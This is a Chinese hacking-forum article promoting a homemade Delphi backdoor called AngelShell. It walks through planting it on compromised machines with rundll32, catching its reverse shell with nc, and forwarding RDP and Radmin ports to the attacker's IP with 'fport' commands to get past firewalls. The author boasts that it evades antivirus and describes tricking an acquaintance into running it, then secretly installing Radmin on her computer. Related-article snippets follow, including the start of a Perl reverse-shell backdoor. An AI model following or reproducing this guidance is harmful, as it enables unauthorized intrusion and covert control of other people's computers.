AngelShell:让所有正向程序实现反向连接(应用篇)

现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴啊!什么终端服务、什么Radmin之类的控方式想都不要想。试了试,发现几乎都支持反向连接,正向连接只能连接80和21端口,连1433都连不上。那就传个反向的后门上去吧,一传上去就被杀毒软件Kill了。一气之下,搬出Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同分享一下。

这个程序叫AngelShell,这里用我的肉鸡和自己使用的计算机做测试。首先需要在本地配置一个记载反向连接信息的文件,第一行是自己的IP,第二行是用NC监听的端口。写好后把它放到HTTP空间上,然后进行配置:配置好密码和你刚才上传到FTP空间里的HTTP访问地址。

你可以选择生成DLL的服务端或者EXE的服务端,其中EXE的服务端直接运行即可安装,而DLL的服务端则需要用如下命令安装:“rundll32 dll路径,I”,记得最后一个I一定要大写。

小提示:程序作者其实是为了方便大家才提供的EXE服务端,其本质也是安装DLL程序,只不过是用程序来解包并自动实现安装。

这里我以DLL服务端来示范。先把DLL传到心爱的肉鸡上面,然后在命令行上面打入:“rundll32 angel.dll,I”。注意这里我是通过FTP连接上肉鸡的,为了方便就直接用FTP的命令行安装了。

装好以后,在自己的机器上用:“nc –v –l –p 7787”监听7787端口,也就是我最开始写的配置文件里的端口。过了一会NC就提示有信息传输,输入密码敲回车,OK,连接成功。帮助信息显示后,可爱的Shell出来了。

小提示:这个后门还提供了一些附加命令,可以直接在Shell中执行。作者为了避免与已有的程序名冲突,所以附加命令全部为小写。

  讲到这里,大家也许会觉得偶这款后门除了可以生成EXE服务端以外,也没什么特别的。当然,就这些功能当然不够打造出我的特色,也不能算是硬件防火墙的噩梦。我们这次用的后门,不仅是要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等等!呵呵,不要吃惊,好戏正在后头呢,偶不会让大家失望的,Let's GO!

看到Shell里的Fport附加命令没有?也就是端口转发,它可以把远程计算机的任意端口反向模拟到本地来。什么?你没懂?呵呵,没关系,往下看就知道了。我们先来测试一下Windows的终端服务。这台肉鸡以前就被我开过终端服务了,但一直苦于硬件防火墙的拦截而无法连接,今天要好好爽一下!

小知识:Fport的用法:

fport

其中参数local port是指你在肉鸡上要转发的端口,Your IP 是你的IP(或域名,YourPort是指你的客户端上监听的端口。

打开客户端,在“要模拟的端口”上面填3389,在“连接远程计算机的端口”上任意填,当然不要与已开的端口冲突,这里我填7788,然后点“开始监听”。赶紧到肉鸡的Shell下面敲入:“fport 3389 61.187.***.*** 7788”。其中3389是肉鸡的终端服务的端口,7788是我们这边这个连接远程计算机的端口。然后客户端上马上提示已接收到远程计算机的连接,提示此时已经可以连接本地的3389端口了。这样我们就把肉鸡上的3389端口搬到自己的爱机上来了。

朋友们,我们还等什么呢?打开终端服务登录器,IP填上本地的127.0.0.1,连接,客户端马上显示已经成功建立了一个新的连接,并出现了远程桌面登录的对话框,我心里那个激动啊,真是语言无法表达!

我们再试试登录两个用户,客户端又显示成功建立了一个新的连接。事实证明,同时登录2个用户也成功了!当然,如果你愿意的话可以登录更多的用户,我编程的时候设置的每个连接都通过2个线程来进行数据传输,所以在传输速度方面是有保障的。

  正沉浸在喜悦中时,电话响了,原来是一位MM买了摄像头,叫我去帮她装,这也要去?于是叫她上QQ,正好给偶再测试一次。这位MM虽然没有硬件级的防火墙,但是她在内网,用的是Windows XP专业版。我先把EXE的服务端传给她,叫她运行,然后在本地进行监听,过一会就提示收到信息并需要输入密码。输入密码后得到了一个Shell,再用文件下载功能给她安装一个Radmin,够阴险吧!然后敲入如下命令:“fport 4899 61.187.***.*** 7788”,将她的4899端口转发到我的4899端口来,然后在本地打开Radmin Viewer,连接IP写127.0.0.1,端口就用默认的4899,成功连接!。

帮她打开设备管理器,三下五除二装好了摄相头驱动程序,MM还楞在那不知道怎么回事,哈哈,等她反应过来后那个崇拜啊!非吵着要拜我为师,汗……测试到这里也就结束了,心里的痛快就别提了,呵呵!

该程序理论上是支持任何协议的,但是由于某些协议的特殊性,它会对IP进行验证,所以可能会达不到我们想要的效果。比如WEB服务,今天本来把肉鸡上的80端口转过来了,想骗骗别人说自己开了个网站。结果一连上来却显示什么:“No web……in this ……”,大概意思就是这个地址没有WEB服务,这才想起HTTP协议中还有个Host的值不符合,难怪。

最后说一下关于在内网中使用本程序的方法。如果自己在内网的话,需要一台允许正向连接的肉鸡来做中转,把要转的那台服务器的端口转到这个中转肉鸡上,然后直接连接这个中转肉鸡就相当于连接服务器了!

好了,希望这篇文章能给大家带来帮助,朋友们能看到这里,我也已经很感谢了。最后祝大家永远开心,技术蒸蒸日上!

(0)

相关推荐

  • AngelShell:让所有正向程序实现反向连接(应用篇)

    现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴啊!什么终端服务.什么Radmin之类的控方式想都不要想.试了试,发现几乎都支持反向连接,正向连接只能连接80和21端口,连1433都连不上.那就传个反向的后门上去吧,一传上去就被杀毒软件Kill了.一气之下,搬出Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同分享一下. 这个程序叫Ang

  • nginx正向代理与反向代理详解

    正向代理 就是假设有一个内网 内网有两台机器,这两台机器只有 a 可以上网 b 不能上网,但是 a 和 b 通过网络相连接 这时如果 b 想访问外网,就可以通过 a 来正向代理访问外网 正向代理就是在内网中模拟目标服务器,把内网中其它机器的请求 转发给外网中的真正的目标服务器 所以正向代理是接受内网其它机器的请求的 反向代理则是反过来 也是一个内网,有几台机器,只有其中一台与外网连接 但是反向代理接受的不是内网机器的访问请求 反向代理接受的是外网过来的访问请求 然后把请求转发到内网中的其它机器上

  • Python实现Socket通信建立TCP反向连接

    目录 前言 远程控制 脚本编写 脚本优化 getopt () 完整代码 前言 本文将记录学习基于 Socket 通信机制建立 TCP 反向连接,借助 Python 脚本实现主机远程控制的目的. 我们在传输数据时,可以只使用(传输层)TCP/IP 协议,但是那样的话,如果没有应用层,便无法识别数据内容,如果想要使传输的数据有意义,则必须使用到应用层协议,应用层协议有很多,比如 HTTP.FTP.TELNET 等,也可以自己定义应用层协议.而 Socket 是对 TCP/IP 协议的封装,Socke

  • .NET5控制台程序使用EF连接MYSQL数据库的方法

    1.使用nuget下载: Microsoft.Extensions.Configuration.Json Pomelo.EntityFrameworkCore.MySql 2.数据库中创建好表: CREATE TABLE `user2` ( `mid` int NOT NULL AUTO_INCREMENT, `uname` varchar(45) NOT NULL, `memo` varchar(200) DEFAULT NULL, PRIMARY KEY (`mid`) ) ENGINE=I

  • python实现DNS正向查询、反向查询的例子

    1.DNS查询过程: 以查询 www.baidu.com为例 (1)电脑向本地域名服务器发送解析www.baidu.com的请求(2)本地域名服务器收到请求后,先查询本地的缓存,如果找到直接返回查询结果,如果没有该记录,本地域名服务器把www.baidu.com的请求发送给根域名服务器(3)根域名服务器收到请求后,把.com域的服务器IP地址返回给本地域名服务器(4)本地域名服务器连接.com服务器,向其请求解析域名www.baidu.com, .com服务器把baidu.com服务器的IP地址

  • 正则表达式断言、巡视(Assertions)、正向断言、反向断言介绍

    断言(Assertions)在正则表达式概念里面难理解,它通常指的是在目标字符串的当前匹配位置进行的一种测试但这种测试并不占用目标字符串,也即不会移动模式在目标字符串中的当前匹配位置.详细可以看看,正则表达式匹配解析过程探讨分析(正则表达式匹配原理),里面提到"零宽度"很多元字符,只是对特殊位置进行匹配,它们可以理解为断言. 断言元字符 常见断言元字符有: \b, \B, \A, \Z, \z, ^ ,$ 它们只是表示特殊位置,各自作用如有字符串AB,带位置表示为:0A1B2 元字符

  • 详解Python程序与服务器连接的WSGI接口

    了解了HTTP协议和HTML文档,我们其实就明白了一个Web应用的本质就是: 浏览器发送一个HTTP请求: 服务器收到请求,生成一个HTML文档: 服务器把HTML文档作为HTTP响应的Body发送给浏览器: 浏览器收到HTTP响应,从HTTP Body取出HTML文档并显示. 所以,最简单的Web应用就是先把HTML用文件保存好,用一个现成的HTTP服务器软件,接收用户请求,从文件中读取HTML,返回.Apache.Nginx.Lighttpd等这些常见的静态服务器就是干这件事情的. 如果要动

  • JSP程序使用JDBC连接MySQL的教程

    安装和加载JDBC驱动程序 下载JDBC驱动程序mysql-connector-java-5.1.7.zip http://www.jb51.net/softs/214141.html 将里面的文件mysql-connector-java-5.1.7-bin.jar放在项目WEB-INF目录下的lib文件中,安装就已经完成了(前提是你的机器已经安装了MySQL,如果没有安装先安装) 加载在JDBC驱动程序 <%@page language="java" contentType=&

  • perl后门,正向和反向!实例代码

    反向连接代码: 1. #!/usr/bin/perl   2. #usage:   3. #nc -vv -l -p PORT(default 1988) on your local system first,then   4. #Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)   5. #Type 'exit' to exit or press Enter to gain shell when u under the

  • 分布式架构中关于正向代理反向代理面试提问

    目录 引言 1.面试官:完看你简历提到使用过Nginx做代理,你是如何理解“正向代理”,“反向代理”的? 2.面试官:那服务端为什么要使用代理?有啥好处? 3.面试官:那你知道哪些负载均衡算法? 深入分析 什么是负载均衡 常用的负载均衡框架 正向代理&反向代理 正向代理 反向代理 总结 引言 面完了RPC相关的一系列问题,面试官确定我对分布式架构的理论知识和服务间通讯框架(RPC) 确实了解了. 接下来又开始问我网络相关的知识,但不是直接问HTTP三次握手,TCP,UPD这些,因为这些基础已经在

随机推荐